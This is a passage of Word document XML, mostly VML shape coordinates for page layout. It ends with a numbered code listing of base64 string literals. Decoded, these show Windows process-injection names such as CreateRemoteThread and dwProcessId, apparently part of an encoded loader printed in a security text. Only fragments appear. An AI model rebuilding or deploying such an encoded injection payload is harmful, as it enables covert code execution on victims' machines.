        <v:shape style="position:absolute;left:2190;top:14250;width:110;height:230" coordorigin="2190,14250" coordsize="110,230" path="m2205,14265l2205,14265,2205,14265,2205,14265,2205,14265,2205,14265,2205,14265,2205,14265,2205,14265,2205,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2206,14265,2207,14265,2207,14265,2207,14265,2207,14265,2207,14265,2207,14265,2207,14265,2208,14265,2208,14265,2208,14265,2208,14265,2209,14265,2209,14265,2209,14265,2209,14265,2210,14265,2210,14265,2210,14265,2211,14265,2211,14265,2211,14265,2212,14265,2212,14265,2213,14265,2213,14265,2214,14265,2214,14265,2215,14265,2215,14265,2216,14265,2216,14265,2217,14265,2217,14265,2218,14265,2219,14265,2219,14265,2220,14265,2221,14265,2222,14265,2222,14265,2223,14265,2224,14265,2225,14265,2226,14265,2227,14265,2227,14265,2228,14265,2229,14265,2230,14265,2231,14265,2232,14265,2234,14265,2235,14265,2236,14265,2237,14265,2238,14265,2239,14265,2241,14265,2242,14265,2243,14265,2245,14265,2246,14265,2247,14265,2249,14265,2250,14265,2252,14265,2253,14265,2255,14265,2257,14265,2258,14265,2260,14265,2262,14265,2263,14265,2265,14265,2267,14265,2269,14265,2271,14265,2273,14265,2275,14265,2277,14265,2279,14265,2281,14265,2283,14265,2285,14265,2287,14265,2290,14265,2292,14265,2294,14265,2297,14265,2299,14265,2302,14265,2304,14265,2307,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14265,2309,14266,2309,14266,2309,14266,2309,14266,2309,14266,2309,14266,2309,14266,2309,14266,2309,14267,2309,14267,2309,14267,2309,14267,2309,14268,2309,14268,2309,14268,2309,14269,2309,14269,2309,14269,2309,14270,2309,14270,2309,14271,2309,14271,2309,14272,2309,14272,2309,14273,2309,14273,2309,14274,2309,14275,2309,14275,2309,14276,2309,14277,2309,14278,2309,14279,2309,14280,2309,14280,2309,14281,2309,14282,2309,14283,2309,14285,2309,14286,2309,14287,2309,14288,2309,14289,2309,14291,2309,14292,2309,14293,2309,14295,2309,14296,2309,14298,2309,14299,2309,14301,2309,14303,2309,14304,2309,14306,2309,14308,2309,14310,2309,14312,2309,14314,2309,14316,2309,14318,2309,14320,2309,14322,2309,14325,2309,14327,2309,14330,2309,14332,2309,14335,2309,14337,2309,14340,2309,14343,2309,14345,2309,14348,2309,14351,2309,14354,2309,14357,2309,14360,2309,14364,2309,14367,2309,14370,2309,14374,2309,14377,2309,14381,2309,14384,2309,14388,2309,14392,2309,14396,2309,14400,2309,14404,2309,14408,2309,14412,2309,14416,2309,14421,2309,14425,2309,14430,2309,14434,2309,14439,2309,14444,2309,14449,2309,14454,2309,14459,2309,14464,2309,14469,2309,14475,2309,14480,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2309,14486,2308,14486,2308,14486,2308,14486,2308,14486,2308,14486,2308,14486,2308,14486,2308,14486,2307,14486,2307,14486,2307,14486,2307,14486,2307,14486,2306,14486,2306,14486,2306,14486,2306,14486,2305,14486,2305,14486,2305,14486,2304,14486,2304,14486,2304,14486,2303,14486,2303,14486,2302,14486,2302,14486,2302,14486,2301,14486,2301,14486,2300,14486,2300,14486,2299,14486,2298,14486,2298,14486,2297,14486,2297,14486,2296,14486,2295,14486,2295,14486,2294,14486,2293,14486,2292,14486,2292,14486,2291,14486,2290,14486,2289,14486,2288,14486,2287,14486,2286,14486,2285,14486,2284,14486,2283,14486,2282,14486,2281,14486,2280,14486,2279,14486,2278,14486,2276,14486,2275,14486,2274,14486,2273,14486,2271,14486,2270,14486,2269,14486,2267,14486,2266,14486,2264,14486,2263,14486,2261,14486,2260,14486,2258,14486,2256,14486,2255,14486,2253,14486,2251,14486,2249,14486,2248,14486,2246,14486,2244,14486,2242,14486,2240,14486,2238,14486,2236,14486,2234,14486,2232,14486,2229,14486,2227,14486,2225,14486,2223,14486,2220,14486,2218,14486,2216,14486,2213,14486,2211,14486,2208,14486,2205,14486,2205,14486,2205,14486,2205,14486,2205,14486,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14485,2205,14484,2205,14484,2205,14484,2205,14484,2205,14484,2205,14483,2205,14483,2205,14483,2205,14483,2205,14482,2205,14482,2205,14482,2205,14481,2205,14481,2205,14480,2205,14480,2205,14479,2205,14479,2205,14478,2205,14478,2205,14477,2205,14476,2205,14476,2205,14475,2205,14474,2205,14474,2205,14473,2205,14472,2205,14471,2205,14470,2205,14469,2205,14468,2205,14467,2205,14466,2205,14465,2205,14464,2205,14463,2205,14461,2205,14460,2205,14459,2205,14457,2205,14456,2205,14454,2205,14453,2205,14451,2205,14450,2205,14448,2205,14446,2205,14444,2205,14443,2205,14441,2205,14439,2205,14437,2205,14435,2205,14432,2205,14430,2205,14428,2205,14426,2205,14423,2205,14421,2205,14419,2205,14416,2205,14413,2205,14411,2205,14408,2205,14405,2205,14402,2205,14399,2205,14396,2205,14393,2205,14390,2205,14387,2205,14384,2205,14380,2205,14377,2205,14373,2205,14370,2205,14366,2205,14362,2205,14359,2205,14355,2205,14351,2205,14347,2205,14343,2205,14338,2205,14334,2205,14330,2205,14325,2205,14321,2205,14316,2205,14311,2205,14307,2205,14302,2205,14297,2205,14292,2205,14287,2205,14281,2205,14276,2205,14271,2205,14265e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:712.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,14250" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:14250;width:110;height:230" coordorigin="2610,14250" coordsize="110,230" path="m2620,14265l2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2620,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2621,14265,2622,14265,2622,14265,2622,14265,2622,14265,2622,14265,2622,14265,2623,14265,2623,14265,2623,14265,2623,14265,2624,14265,2624,14265,2624,14265,2624,14265,2625,14265,2625,14265,2625,14265,2626,14265,2626,14265,2626,14265,2627,14265,2627,14265,2628,14265,2628,14265,2629,14265,2629,14265,2630,14265,2630,14265,2631,14265,2631,14265,2632,14265,2632,14265,2633,14265,2634,14265,2634,14265,2635,14265,2636,14265,2637,14265,2637,14265,2638,14265,2639,14265,2640,14265,2641,14265,2642,14265,2642,14265,2643,14265,2644,14265,2645,14265,2646,14265,2647,14265,2649,14265,2650,14265,2651,14265,2652,14265,2653,14265,2654,14265,2656,14265,2657,14265,2658,14265,2660,14265,2661,14265,2662,14265,2664,14265,2665,14265,2667,14265,2668,14265,2670,14265,2672,14265,2673,14265,2675,14265,2677,14265,2678,14265,2680,14265,2682,14265,2684,14265,2686,14265,2688,14265,2690,14265,2692,14265,2694,14265,2696,14265,2698,14265,2700,14265,2702,14265,2705,14265,2707,14265,2709,14265,2712,14265,2714,14265,2717,14265,2719,14265,2722,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14267,2724,14267,2724,14267,2724,14267,2724,14268,2724,14268,2724,14268,2724,14269,2724,14269,2724,14269,2724,14270,2724,14270,2724,14271,2724,14271,2724,14272,2724,14272,2724,14273,2724,14273,2724,14274,2724,14275,2724,14275,2724,14276,2724,14277,2724,14278,2724,14279,2724,14280,2724,14280,2724,14281,2724,14282,2724,14283,2724,14285,2724,14286,2724,14287,2724,14288,2724,14289,2724,14291,2724,14292,2724,14293,2724,14295,2724,14296,2724,14298,2724,14299,2724,14301,2724,14303,2724,14304,2724,14306,2724,14308,2724,14310,2724,14312,2724,14314,2724,14316,2724,14318,2724,14320,2724,14322,2724,14325,2724,14327,2724,14330,2724,14332,2724,14335,2724,14337,2724,14340,2724,14343,2724,14345,2724,14348,2724,14351,2724,14354,2724,14357,2724,14360,2724,14364,2724,14367,2724,14370,2724,14374,2724,14377,2724,14381,2724,14384,2724,14388,2724,14392,2724,14396,2724,14400,2724,14404,2724,14408,2724,14412,2724,14416,2724,14421,2724,14425,2724,14430,2724,14434,2724,14439,2724,14444,2724,14449,2724,14454,2724,14459,2724,14464,2724,14469,2724,14475,2724,14480,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2723,14486,2723,14486,2723,14486,2723,14486,2723,14486,2723,14486,2723,14486,2722,14486,2722,14486,2722,14486,2722,14486,2722,14486,2722,14486,2721,14486,2721,14486,2721,14486,2721,14486,2720,14486,2720,14486,2720,14486,2719,14486,2719,14486,2719,14486,2718,14486,2718,14486,2717,14486,2717,14486,2716,14486,2716,14486,2716,14486,2715,14486,2714,14486,2714,14486,2713,14486,2713,14486,2712,14486,2712,14486,2711,14486,2710,14486,2709,14486,2709,14486,2708,14486,2707,14486,2706,14486,2706,14486,2705,14486,2704,14486,2703,14486,2702,14486,2701,14486,2700,14486,2699,14486,2698,14486,2697,14486,2696,14486,2695,14486,2694,14486,2693,14486,2691,14486,2690,14486,2689,14486,2688,14486,2686,14486,2685,14486,2684,14486,2682,14486,2681,14486,2679,14486,2678,14486,2676,14486,2675,14486,2673,14486,2671,14486,2670,14486,2668,14486,2666,14486,2664,14486,2663,14486,2661,14486,2659,14486,2657,14486,2655,14486,2653,14486,2651,14486,2649,14486,2647,14486,2644,14486,2642,14486,2640,14486,2638,14486,2635,14486,2633,14486,2631,14486,2628,14486,2626,14486,2623,14486,2620,14486,2620,14486,2620,14486,2620,14486,2620,14486,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14484,2620,14484,2620,14484,2620,14484,2620,14484,2620,14483,2620,14483,2620,14483,2620,14483,2620,14482,2620,14482,2620,14482,2620,14481,2620,14481,2620,14480,2620,14480,2620,14479,2620,14479,2620,14478,2620,14478,2620,14477,2620,14476,2620,14476,2620,14475,2620,14474,2620,14474,2620,14473,2620,14472,2620,14471,2620,14470,2620,14469,2620,14468,2620,14467,2620,14466,2620,14465,2620,14464,2620,14463,2620,14461,2620,14460,2620,14459,2620,14457,2620,14456,2620,14454,2620,14453,2620,14451,2620,14450,2620,14448,2620,14446,2620,14444,2620,14443,2620,14441,2620,14439,2620,14437,2620,14435,2620,14432,2620,14430,2620,14428,2620,14426,2620,14423,2620,14421,2620,14419,2620,14416,2620,14413,2620,14411,2620,14408,2620,14405,2620,14402,2620,14399,2620,14396,2620,14393,2620,14390,2620,14387,2620,14384,2620,14380,2620,14377,2620,14373,2620,14370,2620,14366,2620,14362,2620,14359,2620,14355,2620,14351,2620,14347,2620,14343,2620,14338,2620,14334,2620,14330,2620,14325,2620,14321,2620,14316,2620,14311,2620,14307,2620,14302,2620,14297,2620,14292,2620,14287,2620,14281,2620,14276,2620,14271,2620,14265e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:14810;width:110;height:230" coordorigin="2190,14810" coordsize="110,230" path="m2205,14823l2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2207,14823,2207,14823,2207,14823,2207,14823,2207,14823,2207,14823,2207,14823,2208,14823,2208,14823,2208,14823,2208,14823,2209,14823,2209,14823,2209,14823,2209,14823,2210,14823,2210,14823,2210,14823,2211,14823,2211,14823,2211,14823,2212,14823,2212,14823,2213,14823,2213,14823,2214,14823,2214,14823,2215,14823,2215,14823,2216,14823,2216,14823,2217,14823,2217,14823,2218,14823,2219,14823,2219,14823,2220,14823,2221,14823,2222,14823,2222,14823,2223,14823,2224,14823,2225,14823,2226,14823,2227,14823,2227,14823,2228,14823,2229,14823,2230,14823,2231,14823,2232,14823,2234,14823,2235,14823,2236,14823,2237,14823,2238,14823,2239,14823,2241,14823,2242,14823,2243,14823,2245,14823,2246,14823,2247,14823,2249,14823,2250,14823,2252,14823,2253,14823,2255,14823,2257,14823,2258,14823,2260,14823,2262,14823,2263,14823,2265,14823,2267,14823,2269,14823,2271,14823,2273,14823,2275,14823,2277,14823,2279,14823,2281,14823,2283,14823,2285,14823,2287,14823,2290,14823,2292,14823,2294,14823,2297,14823,2299,14823,2302,14823,2304,14823,2307,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14824,2309,14824,2309,14824,2309,14824,2309,14824,2309,14824,2309,14825,2309,14825,2309,14825,2309,14826,2309,14826,2309,14826,2309,14827,2309,14827,2309,14827,2309,14828,2309,14828,2309,14829,2309,14829,2309,14830,2309,14830,2309,14831,2309,14832,2309,14832,2309,14833,2309,14834,2309,14835,2309,14835,2309,14836,2309,14837,2309,14838,2309,14839,2309,14840,2309,14841,2309,14842,2309,14843,2309,14844,2309,14846,2309,14847,2309,14848,2309,14850,2309,14851,2309,14852,2309,14854,2309,14855,2309,14857,2309,14859,2309,14860,2309,14862,2309,14864,2309,14866,2309,14868,2309,14869,2309,14871,2309,14874,2309,14876,2309,14878,2309,14880,2309,14882,2309,14885,2309,14887,2309,14890,2309,14892,2309,14895,2309,14897,2309,14900,2309,14903,2309,14906,2309,14909,2309,14912,2309,14915,2309,14918,2309,14921,2309,14925,2309,14928,2309,14931,2309,14935,2309,14938,2309,14942,2309,14946,2309,14950,2309,14953,2309,14957,2309,14961,2309,14966,2309,14970,2309,14974,2309,14978,2309,14983,2309,14987,2309,14992,2309,14997,2309,15002,2309,15006,2309,15011,2309,15016,2309,15022,2309,15027,2309,15032,2309,15038,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2307,15043,2307,15043,2307,15043,2307,15043,2307,15043,2306,15043,2306,15043,2306,15043,2306,15043,2305,15043,2305,15043,2305,15043,2304,15043,2304,15043,2304,15043,2303,15043,2303,15043,2302,15043,2302,15043,2302,15043,2301,15043,2301,15043,2300,15043,2300,15043,2299,15043,2298,15043,2298,15043,2297,15043,2297,15043,2296,15043,2295,15043,2295,15043,2294,15043,2293,15043,2292,15043,2292,15043,2291,15043,2290,15043,2289,15043,2288,15043,2287,15043,2286,15043,2285,15043,2284,15043,2283,15043,2282,15043,2281,15043,2280,15043,2279,15043,2278,15043,2276,15043,2275,15043,2274,15043,2273,15043,2271,15043,2270,15043,2269,15043,2267,15043,2266,15043,2264,15043,2263,15043,2261,15043,2260,15043,2258,15043,2256,15043,2255,15043,2253,15043,2251,15043,2249,15043,2248,15043,2246,15043,2244,15043,2242,15043,2240,15043,2238,15043,2236,15043,2234,15043,2232,15043,2229,15043,2227,15043,2225,15043,2223,15043,2220,15043,2218,15043,2216,15043,2213,15043,2211,15043,2208,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15042,2205,15042,2205,15042,2205,15042,2205,15042,2205,15042,2205,15042,2205,15041,2205,15041,2205,15041,2205,15041,2205,15040,2205,15040,2205,15040,2205,15039,2205,15039,2205,15038,2205,15038,2205,15037,2205,15037,2205,15036,2205,15036,2205,15035,2205,15035,2205,15034,2205,15033,2205,15033,2205,15032,2205,15031,2205,15030,2205,15030,2205,15029,2205,15028,2205,15027,2205,15026,2205,15025,2205,15024,2205,15023,2205,15021,2205,15020,2205,15019,2205,15018,2205,15016,2205,15015,2205,15013,2205,15012,2205,15010,2205,15009,2205,15007,2205,15005,2205,15004,2205,15002,2205,15000,2205,14998,2205,14996,2205,14994,2205,14992,2205,14990,2205,14988,2205,14986,2205,14983,2205,14981,2205,14979,2205,14976,2205,14974,2205,14971,2205,14968,2205,14966,2205,14963,2205,14960,2205,14957,2205,14954,2205,14951,2205,14948,2205,14945,2205,14941,2205,14938,2205,14934,2205,14931,2205,14927,2205,14924,2205,14920,2205,14916,2205,14912,2205,14908,2205,14904,2205,14900,2205,14896,2205,14892,2205,14887,2205,14883,2205,14878,2205,14874,2205,14869,2205,14864,2205,14859,2205,14854,2205,14849,2205,14844,2205,14839,2205,14834,2205,14828,2205,14823e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:14810;width:110;height:230" coordorigin="2610,14810" coordsize="110,230" path="m2620,14823l2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2622,14823,2622,14823,2622,14823,2622,14823,2622,14823,2622,14823,2623,14823,2623,14823,2623,14823,2623,14823,2624,14823,2624,14823,2624,14823,2624,14823,2625,14823,2625,14823,2625,14823,2626,14823,2626,14823,2626,14823,2627,14823,2627,14823,2628,14823,2628,14823,2629,14823,2629,14823,2630,14823,2630,14823,2631,14823,2631,14823,2632,14823,2632,14823,2633,14823,2634,14823,2634,14823,2635,14823,2636,14823,2637,14823,2637,14823,2638,14823,2639,14823,2640,14823,2641,14823,2642,14823,2642,14823,2643,14823,2644,14823,2645,14823,2646,14823,2647,14823,2649,14823,2650,14823,2651,14823,2652,14823,2653,14823,2654,14823,2656,14823,2657,14823,2658,14823,2660,14823,2661,14823,2662,14823,2664,14823,2665,14823,2667,14823,2668,14823,2670,14823,2672,14823,2673,14823,2675,14823,2677,14823,2678,14823,2680,14823,2682,14823,2684,14823,2686,14823,2688,14823,2690,14823,2692,14823,2694,14823,2696,14823,2698,14823,2700,14823,2702,14823,2705,14823,2707,14823,2709,14823,2712,14823,2714,14823,2717,14823,2719,14823,2722,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14824,2724,14824,2724,14824,2724,14824,2724,14824,2724,14824,2724,14825,2724,14825,2724,14825,2724,14826,2724,14826,2724,14826,2724,14827,2724,14827,2724,14827,2724,14828,2724,14828,2724,14829,2724,14829,2724,14830,2724,14830,2724,14831,2724,14832,2724,14832,2724,14833,2724,14834,2724,14835,2724,14835,2724,14836,2724,14837,2724,14838,2724,14839,2724,14840,2724,14841,2724,14842,2724,14843,2724,14844,2724,14846,2724,14847,2724,14848,2724,14850,2724,14851,2724,14852,2724,14854,2724,14855,2724,14857,2724,14859,2724,14860,2724,14862,2724,14864,2724,14866,2724,14868,2724,14869,2724,14871,2724,14874,2724,14876,2724,14878,2724,14880,2724,14882,2724,14885,2724,14887,2724,14890,2724,14892,2724,14895,2724,14897,2724,14900,2724,14903,2724,14906,2724,14909,2724,14912,2724,14915,2724,14918,2724,14921,2724,14925,2724,14928,2724,14931,2724,14935,2724,14938,2724,14942,2724,14946,2724,14950,2724,14953,2724,14957,2724,14961,2724,14966,2724,14970,2724,14974,2724,14978,2724,14983,2724,14987,2724,14992,2724,14997,2724,15002,2724,15006,2724,15011,2724,15016,2724,15022,2724,15027,2724,15032,2724,15038,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2722,15043,2722,15043,2722,15043,2722,15043,2722,15043,2722,15043,2721,15043,2721,15043,2721,15043,2721,15043,2720,15043,2720,15043,2720,15043,2719,15043,2719,15043,2719,15043,2718,15043,2718,15043,2717,15043,2717,15043,2716,15043,2716,15043,2716,15043,2715,15043,2714,15043,2714,15043,2713,15043,2713,15043,2712,15043,2712,15043,2711,15043,2710,15043,2709,15043,2709,15043,2708,15043,2707,15043,2706,15043,2706,15043,2705,15043,2704,15043,2703,15043,2702,15043,2701,15043,2700,15043,2699,15043,2698,15043,2697,15043,2696,15043,2695,15043,2694,15043,2693,15043,2691,15043,2690,15043,2689,15043,2688,15043,2686,15043,2685,15043,2684,15043,2682,15043,2681,15043,2679,15043,2678,15043,2676,15043,2675,15043,2673,15043,2671,15043,2670,15043,2668,15043,2666,15043,2664,15043,2663,15043,2661,15043,2659,15043,2657,15043,2655,15043,2653,15043,2651,15043,2649,15043,2647,15043,2644,15043,2642,15043,2640,15043,2638,15043,2635,15043,2633,15043,2631,15043,2628,15043,2626,15043,2623,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15041,2620,15041,2620,15041,2620,15041,2620,15040,2620,15040,2620,15040,2620,15039,2620,15039,2620,15038,2620,15038,2620,15037,2620,15037,2620,15036,2620,15036,2620,15035,2620,15035,2620,15034,2620,15033,2620,15033,2620,15032,2620,15031,2620,15030,2620,15030,2620,15029,2620,15028,2620,15027,2620,15026,2620,15025,2620,15024,2620,15023,2620,15021,2620,15020,2620,15019,2620,15018,2620,15016,2620,15015,2620,15013,2620,15012,2620,15010,2620,15009,2620,15007,2620,15005,2620,15004,2620,15002,2620,15000,2620,14998,2620,14996,2620,14994,2620,14992,2620,14990,2620,14988,2620,14986,2620,14983,2620,14981,2620,14979,2620,14976,2620,14974,2620,14971,2620,14968,2620,14966,2620,14963,2620,14960,2620,14957,2620,14954,2620,14951,2620,14948,2620,14945,2620,14941,2620,14938,2620,14934,2620,14931,2620,14927,2620,14924,2620,14920,2620,14916,2620,14912,2620,14908,2620,14904,2620,14900,2620,14896,2620,14892,2620,14887,2620,14883,2620,14878,2620,14874,2620,14869,2620,14864,2620,14859,2620,14854,2620,14849,2620,14844,2620,14839,2620,14834,2620,14828,2620,14823e x" fillcolor="#fefefe" stroke="f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68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65" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>125</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>126</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJb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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>l"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
